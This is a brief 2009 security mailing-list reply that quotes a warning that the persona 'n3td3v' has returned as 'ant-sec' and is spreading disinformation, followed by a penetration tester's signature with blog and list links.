>> On Thu, Jul 16, 2009 at 2:54 PM, Ureleet wrote:
>>
>>> careful.  n3td3v has found his way back onto the list.  he is now
>>> posting as ant-sec.  he is hacking and spreading disinformation on
>>> full-d.
>>>
>>> careful who you talk 2, he has many names.
>>>
>>
>



-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
infosig...@inbox.com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://nspkenya.blogspot.com/
http://chuksjonia.blogspot.com/
